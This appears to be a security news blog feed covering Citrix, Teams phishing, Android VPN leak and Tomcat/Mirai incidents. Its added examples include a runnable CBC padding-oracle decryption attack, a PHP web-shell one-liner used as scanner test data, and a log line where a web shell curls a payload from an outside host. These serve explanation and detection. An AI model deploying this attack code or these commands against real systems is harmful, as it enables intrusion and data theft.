Calenderweek 31 – WafdogBlog (http://192.168.11.11), feed generated Fri, 22 Mar 2024 12:12:48 +0000

Critical Citrix Vulnerabilities Lead to Widespread Cybersecurity Breaches
http://192.168.11.11/critical-citrix-vulnerabilities-lead-to-widespread-cybersecurity-breaches/ – Wed, 15 Nov 2023 12:00:09 +0000


The Shadowserver Foundation reports that multiple Citrix NetScaler ADC and NetScaler Gateway appliances have been compromised through CVE-2023-3519, a critical code injection vulnerability (CVSS 9.8) that allows unauthenticated remote code execution on appliances configured as a Gateway or AAA virtual server; Citrix patched it in a recent update. Most of the compromised appliances are in Germany, France, Switzerland, Italy, Sweden, Spain, Japan, China, Austria, and Brazil, and the attackers drop web shells to keep access after the initial exploit.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) had already disclosed, in a July 2023 advisory, that the vulnerability was exploited in June 2023 against a critical infrastructure organization, where the intrusion likewise involved a web shell on the appliance.

GreyNoise also observed exploitation attempts against a second Citrix flaw, CVE-2023-24489 in the ShareFile (Citrix Content Collaboration) storage zones controller, rated 9.1. It lets an unauthenticated attacker upload arbitrary files, which leads to remote code execution; it is fixed in ShareFile storage zones controller 5.11.24 and later.

Assetnote, an attack surface management company, found the flaw and described it as a simpler variant of a padding oracle attack: ShareFile decrypts attacker-supplied input with AES in Cipher Block Chaining (CBC) mode and PKCS#7 padding, and whether a forged ciphertext is accepted depends only on whether its padding checks out, not on any authenticity check of the decrypted data. Assetnote's Dylan Pindur stressed that understanding exactly how .NET's AES implementation behaves with CBC mode and PKCS#7 padding is the key to spotting this class of bug.
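The mechanics behind that observation, as an added example (not Assetnote's proof of concept and not ShareFile code): a server that decrypts CBC ciphertext and reveals only whether the PKCS#7 padding was valid gives an attacker enough to recover the whole plaintext, one byte at a time, without the key. A keyed toy permutation stands in for AES so the script needs nothing beyond the standard library; the attack only ever calls the oracle, so the logic is unchanged with real AES. The secret and key are constructed.

```python
import os
import random

BLOCK = 16

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    # Strict, as in .NET's CBC decryptor: last byte n in 1..BLOCK and the last n
    # bytes all equal to n; anything else raises, and that is what the oracle leaks.
    if not data or len(data) % BLOCK:
        raise ValueError("bad length")
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

class ToyBlockCipher:
    # Keyed per-position byte permutations: a stand-in for AES (NOT secure) so the example runs offline.
    def __init__(self, key: bytes):
        rng = random.Random(key)
        self.fwd, self.inv = [], []
        for _ in range(BLOCK):
            perm = list(range(256))
            rng.shuffle(perm)
            self.fwd.append(perm)
            self.inv.append(sorted(range(256), key=perm.__getitem__))

    def encrypt_block(self, b: bytes) -> bytes:
        return bytes(self.fwd[i][x] for i, x in enumerate(b))

    def decrypt_block(self, b: bytes) -> bytes:
        return bytes(self.inv[i][x] for i, x in enumerate(b))

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_encrypt(cipher, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = cipher.encrypt_block(xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(cipher, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        block = ct[i:i + BLOCK]
        out += xor(cipher.decrypt_block(block), prev)
        prev = block
    return out

def make_oracle(cipher):
    # Server side: the only bit exposed is whether the padding was valid.
    def oracle(iv: bytes, ct: bytes) -> bool:
        try:
            pkcs7_unpad(cbc_decrypt(cipher, iv, ct))
            return True
        except ValueError:
            return False
    return oracle

def recover_block(oracle, prev: bytes, block: bytes) -> bytes:
    # Learn D(block) from the last byte backwards by forging the preceding block,
    # then XOR with the real preceding block to obtain the plaintext block.
    inter = bytearray(BLOCK)
    for pad in range(1, BLOCK + 1):
        pos = BLOCK - pad
        forged = bytearray(BLOCK)
        forged[pos + 1:] = bytes(x ^ pad for x in inter[pos + 1:])  # trailing bytes decrypt to `pad`
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged), block):
                continue
            if pad == 1:
                # Edge case: 0x02 0x02 (or longer) also validates; flipping the byte before pos breaks it.
                forged[pos - 1] ^= 0xFF
                still_valid = oracle(bytes(forged), block)
                forged[pos - 1] ^= 0xFF
                if not still_valid:
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError(f"oracle never accepted byte {pos}")
    return xor(bytes(inter), prev)

def recover_plaintext(oracle, iv: bytes, ct: bytes) -> bytes:
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    padded = b"".join(recover_block(oracle, p, b) for p, b in zip([iv] + blocks[:-1], blocks))
    return pkcs7_unpad(padded)

SECRET = b"session=alice;role=admin;exp=1700000000"  # constructed; never shown to the attacker

def demo() -> bytes:
    cipher = ToyBlockCipher(b"demo-key-not-a-real-secret")  # constructed key
    iv = os.urandom(BLOCK)
    ct = cbc_encrypt(cipher, iv, pkcs7_pad(SECRET))
    return recover_plaintext(make_oracle(cipher), iv, ct)  # -> SECRET, from padding verdicts alone
```

Each block costs at most 16 × 256 oracle queries (plus the 0x01 disambiguation check), which is why an attacker needs only a distinguishable error, not the key. The fix is the same in every framework: authenticate the ciphertext (AES-GCM, or encrypt-then-MAC with a constant-time tag check) and verify the tag before any decryption or padding logic runs, so a forged input produces one uniform error regardless of what it would decrypt to.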

Shadowserver later added that nearly 7,000 NetScaler ADC and Gateway instances exposed online remain unpatched, and that CVE-2023-3519 is being actively exploited to drop PHP web shells that give the attackers remote access.
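A triage pass for dropped PHP web shells, as an added example (not Citrix, CISA or Shadowserver tooling): walk a web root, flag .php files modified after a cut-off (for example the date the patch was applied) and files containing classic one-line shell constructs. The patterns and the sample tree written to a temporary directory are constructed; on a real appliance, point `suspicious_php` at its web root and pass the patch date as the cut-off.

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Constructs typical of dropped PHP web shells; each entry is (name, pattern). Constructed list.
SHELL_PATTERNS = [
    ("code-exec call", re.compile(rb"\b(eval|assert|system|passthru|shell_exec|popen|proc_open)\s*\(")),
    ("request param called as function", re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(")),
    ("base64 of request param", re.compile(rb"base64_decode\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)")),
]

def suspicious_php(root, modified_after: float):
    """Return sorted (relative path, reasons) for .php files under root that were
    modified after the cut-off (epoch seconds) or contain web-shell constructs."""
    root = Path(root)
    hits = []
    for path in root.rglob("*.php"):
        reasons = []
        if path.stat().st_mtime > modified_after:
            reasons.append("modified after cut-off")
        data = path.read_bytes()
        reasons += [f"contains {name}" for name, pat in SHELL_PATTERNS if pat.search(data)]
        if reasons:
            hits.append((path.relative_to(root).as_posix(), reasons))
    return sorted(hits)

# Constructed sample tree: two files that predate the cut-off (one of which
# legitimately calls system()) and one freshly dropped one-line shell.
SAMPLE_FILES = {
    "index.php": b'<?php echo "ok"; ?>',
    "admin/tools.php": b'<?php system("df -h"); ?>',
    "uploads/x.php": b'<?php @eval(base64_decode($_POST["z"])); ?>',
}

def demo():
    now = time.time()
    root = Path(tempfile.mkdtemp())
    for rel, body in SAMPLE_FILES.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(body)
        if not rel.startswith("uploads/"):
            os.utime(p, (now - 86400, now - 86400))  # backdate the pre-existing files
    return suspicious_php(root, modified_after=now - 3600)

if __name__ == "__main__":
    for rel, reasons in demo():
        print(rel, "->", ", ".join(reasons))
```

Timestamps are cheap to forge, so the content patterns are there to catch a shell whose mtime was reset, and a file like `admin/tools.php` shows the false-positive side of the content rules; the authoritative check remains a diff of the web root against a known-good image of the same firmware version.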

Russian Hackers Target Global Organizations Through Microsoft Teams
http://192.168.11.11/russian-hackers-target-global-organizations-through-microsoft-teams/ – Wed, 15 Nov 2023 11:35:48 +0000

Since late May 2023, the Russian state-sponsored group tracked as APT29, Midnight Blizzard (formerly Nobelium), UNC2452 and Cozy Bear, which Western governments attribute to Russia’s Foreign Intelligence Service (SVR), has been targeting international organizations, among them government agencies, NGOs, IT service providers and technology and media companies, through Microsoft Teams. According to Microsoft, the campaign is social engineering throughout: phishing conducted over fraudulent Teams chats, aimed at stealing credentials and multi-factor authentication (MFA) codes.

The actor first obtained Microsoft 365 tenants to operate from, by stealing tokens or using other techniques to get hold of tenant credentials, typically those of small businesses. From those compromised tenants it sent fake technical-support messages to trick recipients into handing over credentials and MFA codes. A notable detail is the use of new subdomains under onmicrosoft.com: every Microsoft 365 tenant receives a default *.onmicrosoft.com domain, so a security-themed subdomain created in a compromised tenant looks as if it came from Microsoft itself. Microsoft has notified affected customers and has taken steps to block further abuse of the domains involved.

Separately, researchers at Jumpsec reported in June that they could bypass Microsoft Teams’ client-side controls on external tenants to deliver malware straight into the Teams inboxes of users at other organizations. Microsoft said at the time that the issue did not warrant immediate servicing; the Midnight Blizzard campaign shows why weaknesses in Teams’ external-access controls matter.

The campaign, active since late May 2023, affected fewer than 40 organizations worldwide across several sectors. For initial access Midnight Blizzard used token theft, spear phishing, password spraying and brute-force attacks, then pivoted from compromised on-premises environments into the cloud, as it did in the 2020 SolarWinds intrusion. In some cases the actor tried to register a device in Microsoft Entra ID so that it would count as a managed device and satisfy conditional access policies that require one.

The Teams lures themselves came from new onmicrosoft.com subdomains and newly created users in previously compromised tenants, posing as technical support or as Microsoft’s Identity Protection team. Once a target accepted the chat request, the actor asked them to type a code into the Microsoft Authenticator app; doing so completed a sign-in the actor had initiated and handed the actor a token for the account, which it then used for takeover and follow-on activity.
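A hunting rule for the two observable steps above (a Microsoft-themed *.onmicrosoft.com tenant opening a chat, then a device registered by the lured user shortly afterwards), as an added example that is not Microsoft's detection logic. The event schema is a constructed simplification, not the Teams audit-log or Entra ID sign-in-log format; the tenant names, users and timestamps are made up.

```python
from datetime import datetime, timedelta
from typing import Optional

# Words an actor chooses to pass as Microsoft support or Identity Protection (constructed list).
IMPERSONATION_WORDS = ("microsoft", "msft", "identity protection", "security", "support", "helpdesk")
ONMICROSOFT = ".onmicrosoft.com"

# Constructed events in a simplified schema: Teams chat requests from external
# tenants, plus Entra ID device registrations.
EVENTS = [
    {"time": "2023-05-30T09:01:00", "type": "TeamsExternalChat", "user": "alice@contoso.example",
     "sender": "helpdesk@msftidentityprotection.onmicrosoft.com",
     "sender_name": "Microsoft Identity Protection"},
    {"time": "2023-05-30T09:04:00", "type": "TeamsExternalChat", "user": "bob@contoso.example",
     "sender": "dana@fabrikam.onmicrosoft.com", "sender_name": "Dana Roe"},
    {"time": "2023-05-30T09:06:00", "type": "TeamsExternalChat", "user": "carol@contoso.example",
     "sender": "it@partner.example", "sender_name": "Microsoft Support"},
    {"time": "2023-05-30T09:20:00", "type": "DeviceRegistered", "user": "alice@contoso.example",
     "device": "DESKTOP-7F3Q", "os": "Windows"},
    {"time": "2023-05-30T15:00:00", "type": "DeviceRegistered", "user": "bob@contoso.example",
     "device": "LAPTOP-BOB", "os": "Windows"},
]

def tenant_domain(upn: str) -> str:
    return upn.rsplit("@", 1)[-1].lower()

def lure_severity(event: dict, trusted_tenants) -> Optional[str]:
    """'high' for a Microsoft-themed *.onmicrosoft.com tenant (the pattern described above),
    'medium' for a Microsoft-themed display name from any other external tenant."""
    domain = tenant_domain(event["sender"])
    if domain in trusted_tenants:
        return None
    is_default_domain = domain.endswith(ONMICROSOFT)
    label = domain[:-len(ONMICROSOFT)] if is_default_domain else domain
    haystack = f"{label} {event['sender_name']}".lower()
    if not any(word in haystack for word in IMPERSONATION_WORDS):
        return None
    return "high" if is_default_domain else "medium"

def analyze(events, trusted_tenants=frozenset(), window=timedelta(hours=1)) -> dict:
    """Flag lures, then device registrations by a lured user within `window` of the
    lure: the step the actor takes to satisfy a managed-device conditional access policy."""
    lures = []
    for e in events:
        if e["type"] != "TeamsExternalChat":
            continue
        severity = lure_severity(e, trusted_tenants)
        if severity:
            lures.append({"time": datetime.fromisoformat(e["time"]), "user": e["user"],
                          "sender": e["sender"], "severity": severity})
    registrations = []
    for e in events:
        if e["type"] != "DeviceRegistered":
            continue
        t = datetime.fromisoformat(e["time"])
        for lure in lures:
            delta = t - lure["time"]
            if lure["user"] == e["user"] and timedelta(0) <= delta <= window:
                registrations.append({"user": e["user"], "device": e["device"],
                                      "after_lure_from": lure["sender"],
                                      "minutes_after": int(delta.total_seconds() // 60)})
    return {"lures": lures, "device_registrations": registrations}

if __name__ == "__main__":
    for key, value in analyze(EVENTS).items():
        print(key, value)
```

Two policy points follow from the rule. Conditional access should require a compliant device (one enrolled in and evaluated by your MDM) rather than merely a registered or joined one, since registration is what the actor could do on its own; and the Entra ID device setting that lets any user register devices should be restricted so that a freshly phished token cannot be turned into a "managed" device in the first place.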

These incidents fit a broader pattern that also includes phishing of diplomatic entities in Eastern Europe with a new backdoor named GraphicalProton, and abuse of Azure AD Connect (now Microsoft Entra Connect) to plant stealthy backdoors and intercept credentials.

Mullvad’s Alert: Uncovering VPN Privacy Leaks in Android Devices
http://192.168.11.11/mullvads-alert-uncovering-vpn-privacy-leaks-in-android-devices/ – Wed, 15 Nov 2023 11:28:26 +0000

Mullvad, a VPN provider, has flagged a privacy issue for Android users: the device sends some traffic outside the VPN tunnel even when the “Block connections without VPN” setting (the Always-on VPN lockdown) is enabled. The traffic in question consists of Android’s connectivity checks, which serve purposes such as detecting captive portals and are sent outside the tunnel by design.

The concern is that whoever operates the connectivity check servers, or can observe traffic on the path, sees the user’s real source IP address and can correlate it with the VPN use, and an adversary with broader visibility could use that for further analysis. Mullvad notes that most Android users will not mind the checks, but that the implications are significant for people who rely on a VPN to hide their IP address from everyone.

Android offers no user-facing setting to turn this traffic off, so Mullvad published a technical guide for disabling the connectivity checks manually. Google has classified the behaviour as working as intended, arguing that the data exposed is minimal, that a user-facing switch would confuse most users, and that some VPN apps themselves rely on the connectivity check results.

Mullvad counters that users should at least have the choice to stop any such leak. For now, Android users who want no traffic outside the tunnel must follow Mullvad’s guide and change the relevant device settings themselves.

Securing the Digital Horizon: Protecting Apache Tomcat Servers from Emerging Cyber Threats
http://192.168.11.11/securing-the-digital-horizon-protecting-apache-tomcat-servers-from-emerging-cyber-threats/ – Wed, 15 Nov 2023 11:22:45 +0000

Apache Tomcat is a widely used open-source Java application server that implements the Jakarta Servlet, Jakarta Server Pages, Expression Language and WebSocket specifications on top of its own HTTP server. It is widely adopted among developers, with an adoption rate of around 50%, and underpins many cloud services, big data and web applications.

Aqua’s security researchers have, however, identified a new threat: attackers are abusing misconfigured Tomcat servers to spread Mirai botnet malware and cryptocurrency miners. Over a two-year period Aqua’s honeypots recorded more than 800 attacks on Tomcat servers, 96% of them linked to the Mirai botnet.

The typical attack relies on a shell script named “neww”, served from 24 different IP addresses. It starts with a brute-force attack on the Tomcat Manager application (the web application manager), trying many credential combinations. Once logged in, the attacker deploys a WAR file containing a ‘cmd.jsp’ web shell, which executes arbitrary commands on the server and completes the compromise.

The chain continues with the web shell downloading and executing the “neww” script, which fetches 12 binary files built for different CPU architectures and is then deleted with “rm -rf”. A WAR (Web Application Archive) is Tomcat’s standard deployment package, bundling HTML, CSS, JSPs, servlets and classes, which is why a WAR carrying a web shell deploys like any legitimate application.

The final payload is a Mirai variant that enlists the infected host for DDoS attacks. In short: authenticate to the Manager application with brute-forced but valid credentials, upload a WAR that hides a web shell, and use that shell to run commands and stage the malware.
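The whole chain leaves a trail in Tomcat’s access log. The detector below, an added example rather than Aqua’s tooling, reads lines in the AccessLogValve “common” pattern and flags a burst of 401s on the Manager application, a successful login from the same address, a WAR deployment through the Manager’s deploy or upload endpoints, and requests to a JSP that carry a command parameter. The log lines, the context path “/srv” and the download URL are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"
DEPLOY_RE = re.compile(r"^/manager/(text/deploy|html/upload)(\?|$)")
SHELL_RE = re.compile(r"\.jsp\?.*\b(cmd|exec|command)=", re.IGNORECASE)

# Constructed log: brute force of the Manager app from 203.0.113.7, a login that
# finally succeeds, a WAR deployment, two commands through cmd.jsp, and a
# legitimate admin session from 198.51.100.40 for contrast.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Nov/2023:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [15/Nov/2023:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [15/Nov/2023:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [15/Nov/2023:10:00:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [15/Nov/2023:10:00:04 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [15/Nov/2023:10:00:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - tomcat [15/Nov/2023:10:00:07 +0000] "GET /manager/html HTTP/1.1" 200 21890
203.0.113.7 - tomcat [15/Nov/2023:10:00:12 +0000] "PUT /manager/text/deploy?path=/srv HTTP/1.1" 200 48
203.0.113.7 - - [15/Nov/2023:10:00:15 +0000] "GET /srv/cmd.jsp?cmd=id HTTP/1.1" 200 57
203.0.113.7 - - [15/Nov/2023:10:00:21 +0000] "GET /srv/cmd.jsp?cmd=curl+-O+http://198.51.100.9/neww HTTP/1.1" 200 12
198.51.100.40 - admin [15/Nov/2023:10:05:00 +0000] "GET /manager/html HTTP/1.1" 200 21890
198.51.100.40 - - [15/Nov/2023:10:05:30 +0000] "GET /docs/index.html HTTP/1.1" 200 4321
"""

def parse(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["time"] = datetime.strptime(e["time"], TIME_FMT)
    e["status"] = int(e["status"])
    return e

def detect(log_text: str, threshold: int = 5, window=timedelta(minutes=5)):
    """Return (kind, ip, detail) findings in log order."""
    findings = []
    recent_401 = defaultdict(list)  # ip -> timestamps of recent 401s on /manager/*
    brute_forced, logged_in = set(), set()
    for e in filter(None, map(parse, log_text.splitlines())):
        ip, path, status = e["ip"], e["path"], e["status"]
        if path.startswith("/manager/"):
            if status == 401:
                hits = [t for t in recent_401[ip] if e["time"] - t <= window] + [e["time"]]
                recent_401[ip] = hits
                if len(hits) >= threshold and ip not in brute_forced:
                    brute_forced.add(ip)
                    findings.append(("manager_bruteforce", ip, f"{len(hits)} failed logins within {window}"))
            elif status < 400 and DEPLOY_RE.match(path):
                tag = "after brute force" if ip in brute_forced else "with no preceding brute force"
                findings.append(("war_deploy", ip, f"{e['method']} {path} as {e['user']} {tag}"))
            elif status == 200 and ip in brute_forced and e["user"] != "-" and ip not in logged_in:
                logged_in.add(ip)
                findings.append(("bruteforce_success", ip, f"authenticated as {e['user']}"))
        if SHELL_RE.search(path):
            findings.append(("webshell_command", ip, path))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(*finding)
```

A WAR deployment is worth an alert on its own even without a preceding brute force, since on most production servers nobody should be deploying through the Manager at all. On the prevention side, keep the RemoteAddrValve that Tomcat ships in the Manager application’s context.xml (it limits access to localhost by default), never expose the Manager to the internet, use long unique credentials, and remove the application where it is not needed; the LockOutRealm in the stock server.xml slows a brute force but does not stop a slow, distributed spray like the one described above.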

Against the backdrop of a 399% increase in cryptomining attacks in the first half of 2023, the findings show that the threat is growing. To mitigate it, analysts recommend configuring environments correctly (in particular, not exposing the Manager application with default or weak credentials), scanning regularly for threats, equipping teams with cloud-native vulnerability scanning tools, and deploying runtime detection and response solutions.
